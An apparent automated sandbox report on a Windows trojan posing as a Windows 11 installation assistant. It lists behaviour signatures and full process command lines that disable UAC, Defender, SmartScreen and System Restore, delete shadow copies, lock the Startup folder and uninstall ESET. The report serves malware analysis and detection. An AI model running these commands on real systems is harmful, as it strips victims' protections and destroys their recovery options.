Analysis Overview
SHA256
a9883030a711aebd2ec7faff0091135ee590a0e6ac613a963f55e43edc00c595
Threat Level: Known bad
The file Trojan.Win32.DelShad.exe was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender notification settings
Windows security bypass
UAC bypass
Deletes shadow copies
Disables use of System Restore points
Sets file to hidden
Drops file in Drivers directory
Reads user/profile data of web browsers
Drops startup file
Loads dropped DLL
Executes dropped EXE
Checks BIOS information in registry
Modifies file permissions
Checks computer location settings
Looks up external IP address via web service
Checks installed software on the system
Suspicious use of SetThreadContext
Drops file in Windows directory
Unsigned PE
System Location Discovery: System Language Discovery
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Views/modifies file attributes
Kills process with taskkill
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Uses Volume Shadow Copy service COM API
Suspicious use of SetWindowsHookEx
cURL User-Agent
Interacts with shadow copies
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-14 23:57
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-14 23:57
Reported
2024-11-15 00:00
Platform
win11-20241007-en
Max time kernel
150s
Max time network
135s
Command Line
Signatures
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions\dIsablEEnhAncEdnOtiFiCatiOns = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions | C:\Windows\system32\reg.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsenTPrompTbEhAvIoradmin = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsEnTPromptbehavIOrUser = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromPTOnsECUredesKtoP = "0" | C:\Windows\system32\reg.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns | C:\Windows\system32\rEg.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\Cmd = "0" | C:\Windows\system32\rEg.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns | C:\Windows\system32\rEg.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\EXE = "0" | C:\Windows\system32\rEg.EXE | N/A |
| Key created | \REGISTRY\MACHINE\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs | C:\Windows\system32\rEG.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs | C:\Windows\system32\rEG.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\SCr = "0" | C:\Windows\system32\rEG.EXE | N/A |
Deletes shadow copies
Disables use of System Restore points
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Windows\system32\cmd.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk | C:\Users\Admin\AppData\Local\Temp\is-KI35J.tmp\Trojan.Win32.DelShad.tmp | N/A |
Executes dropped EXE
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Reads user/profile data of web browsers
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipINFO.io | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5064 set thread context of 3788 | N/A | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-KI35J.tmp\Trojan.Win32.DelShad.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-7HM1N.tmp\Trojan.Win32.DelShad.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\find.exe | N/A |
| N/A | N/A | C:\Windows\system32\find.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-KI35J.tmp\Trojan.Win32.DelShad.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"
C:\Users\Admin\AppData\Local\Temp\is-7HM1N.tmp\Trojan.Win32.DelShad.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7HM1N.tmp\Trojan.Win32.DelShad.tmp" /SL5="$D023E,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"
C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-
C:\Users\Admin\AppData\Local\Temp\is-KI35J.tmp\Trojan.Win32.DelShad.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KI35J.tmp\Trojan.Win32.DelShad.tmp" /SL5="$E023E,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\system32\taskkill.exe" /f /im "Windows11InstaIIation.scr"
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\pik.exe
"C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\pik.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\tmp\.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\tmp\.cmd" "
C:\Windows\system32\reg.exe
rEg Add "hKLm\sOftWare\microsOfT\windOws\CurrentVersiOn\polICIEs\sysTem" /v "COnsenTPrompTbEhAvIoradmin" /T rEG_dWOrd /d "0" /F
C:\Windows\system32\reg.exe
reg add "hKlm\sOfTwArE\miCrosoFt\WindoWs\currEntVersIon\PoLiCIes\sysTem" /v "COnsEnTPromptbehavIOrUser" /t reG_dWord /d "0" /f
C:\Windows\system32\reg.exe
rEg add "hKLm\soFtwArE\micrOsofT\WIndOWs\cUrrenTVersiOn\pOliCIes\system" /V "PromPTOnsECUredesKtoP" /t reG_dWOrd /d "0" /f
C:\Windows\system32\reg.exe
reg add "hkLm\soFtwArE\PoliCIes\micrOsoFt\WIndows dEFender\spYneT" /v "sUBmITsAmPlEsConsEnt" /t reg_dWord /d "2" /f
C:\Windows\system32\reg.exe
reG Add "hKlm\softwAre\POlicIes\micrOsOfT\Windows dEfEnder\spyneT" /V "sPynetrePOrTIng" /t rEg_dwOrd /d "0" /f
C:\Windows\system32\reg.exe
reG Add "hKlm\sOftwArE\pOlIcies\micrOsOFT\WIndOws dEFEndEr" /v "pUAproteCTiOn" /T rEG_dWord /d "0" /F
C:\Windows\system32\reg.exe
rEg add "hklm\sOfTware\PolIcIEs\micrOsofT\wIndOws dEfendEr\mPenGinE" /v "mpenABlEpUs" /T reg_dWord /d "0" /F
C:\Windows\system32\reg.exe
rEG Add "hkLm\sofTwAre\pOLiCIEs\miCrosoFT\WindoWs\sYstEm" /v "EnABLesmArTsCrEen" /t reG_dword /d "0" /F
C:\Windows\system32\reg.exe
reG Add "hKlm\sOFTWare\mIcrosoFT\windoWs\cUrrEntVErsiOn\eXPLOrer" /V "smArtscreenEnAblEd" /T reG_sz /d "off" /f
C:\Windows\system32\reg.exe
rEG Add "hklm\sOftware\PoLiciEs\microsoFT\mrt" /V "donTofFerthrOuGhWUAU" /T "reG_dwOrd" /d "1" /f
C:\Windows\system32\reg.exe
rEG Add "hklm\sOFTWare\polIcies\mICrOsoFt\mrt" /V "dontrEportInfECTIOnInFormAtion" /T "rEg_dWord" /d "1" /f
C:\Windows\system32\reg.exe
reG add "hKlm\sOFtWAre\poLICies\mIcrosoft\WindoWs defendEr\uX configuration" /V "notIficatIon_suPPrEss" /t reG_dwOrd /d "1" /f
C:\Windows\system32\reg.exe
rEG add "hklm\sOfTWArE\PoliCiEs\miCrosoFT\wIndoWs deFEndEr\WIndows deFender eXplOIT GUArd\ConTrolLed fOLdEr acCess" /v "enablEContrOlledfOLdEracCess" /t reg_dWord /d "0" /F
C:\Windows\system32\reg.exe
reG add "hkLm\soFTWare\PoLicies\microsOFT\wIndOws dEfEndEr\rEpOrTInG" /v "dIsAblEEnhAncednOtIFicaTiOns" /T rEG_dword /d "1" /f
C:\Windows\system32\reg.exe
reG add "hklm\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions" /V "dIsablEEnhAncEdnOtiFiCatiOns" /t rEg_dWord /d "1" /F
C:\Windows\system32\reg.exe
reg add "hKLm\softWarE\mIcrosOFt\wIndows dEfender securitY centEr\vIrUs and ThreAT ProtECtIOn" /v "FIlesBLocKednOTIfiCAtiOndIsablEd" /t rEG_dwOrd /d "1" /F
C:\Windows\system32\reg.exe
rEG Add "hkLm\sofTware\miCrOsOFt\WIndoWs defEnder seCUriTY centEr\VIrus and threAT proTectiOn" /V "nOaCTIOnnOTIFiCAtIOndIsaBLed" /T rEG_dWord /d "1" /F
C:\Windows\system32\reg.exe
reG add "hkLm\softwAre\mIcrosOFT\WindOWs dEfEnder sECUriTy center\virUs And ThrEAt PrOteCTIon" /v "summarynOtIfIcaTIOndIsABled" /t rEG_dwOrd /d "1" /F
C:\Windows\system32\reg.exe
reg add "hklm\sOftwAre\PolICiEs\miCrOsofT\wIndows\exPlorEr" /V "dIsABLEnOtIFICaTIoncenTer" /T rEG_dWord /d "1" /F
C:\Windows\system32\reg.exe
rEG add "hkCu\sOFtWarE\micrOsOFT\wIndOWs\currenTVersIOn\PUshnOTIfICatIOns" /v "ToastEnablEd" /t rEg_dWord /d "0" /f
C:\Windows\system32\reg.exe
reg Add "hKLm\soFtwarE\pOlicIes\micrOsOfT\wIndOWs dEfEnder sEcuritY CEnter\VIrUs And ThrEAT prOTECTion" /v UIlOCKdOWn /T rEG_dWOrd /d 1 /f
C:\Windows\system32\reg.exe
rEg add "hKlm\softWArE\POlICiEs\miCrOsofT\wIndOWs dEfEndEr seCUrItY cenTEr\ApP and Browser prOtEction" /V uIloCkdoWn /T rEg_dword /d 1 /f
C:\Windows\system32\reg.exe
reG add "hklm\sOFtWarE\POliCiEs\microsofT\wIndows nT\sysTEmrestorE" /V "disAblECOnfIG" /T reG_dword /d "1" /F
C:\Windows\system32\reg.exe
rEG add "hKLm\soFtWAre\POLIcIes\mICrOsOFT\wIndows nT\sYsTemresTore" /v "disabLEsr" /T rEg_dword /d "1" /F
C:\Windows\system32\reg.exe
rEG add "hKcU\sOFTWare\mIcrosOFT\WIndoWs\CUrrenTvErsIon\poLiCiEs\aTTaChmenTs" /V "sAvezOnEInformATiOn" /T rEg_dwOrd /d "1" /F
C:\Windows\system32\reg.exe
reG add "hKLm\sOfTWarE\mICrosOft\windOWs\CurrEnTvErsIon\POLiCIes\AtTachments" /V "sAvEzoneinfOrmATiOn" /T reg_dword /d "1" /f
C:\Windows\system32\reg.exe
rEg Add "hKlm\soFTWArE\micrOsoFt\windOws\cUrrenTversiOn\POliciEs\AttachmEnTs" /v "scAnwithantivIrus" /t rEG_dwOrd /d "1" /f
C:\Windows\system32\icacls.exe
icaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /remOve:d "EvErYOnE" /t /C
C:\Windows\system32\icacls.exe
iCaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /denY "eVEryOnE":(dE,dC) /t /c
C:\Windows\system32\vssadmin.exe
vssadmin dELETe shadOws /aLl /QuIEt
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\attrib.exe
aTTrIb +S +H C:\TMP
C:\Windows\system32\find.exe
find /c /i "checkappexec.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "safebrowsing.googleapis.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "ars.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "apprep.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "c.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "feedback.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "ping.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "ping.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "t.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "t.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "t.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "unitedstates.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "unitedstates.smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "urs.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "slscr.update.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\System32\Wbem\WMIC.exe
wmic product where name="ESET Security" call uninstall /nointeractive
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\.cmd""
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
rp.EXE /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
rP.EXE /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /TI/ /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
rP.EXE /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
C:\Windows\system32\rEG.EXE
"C:\Windows\system32\rEG.EXE" add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
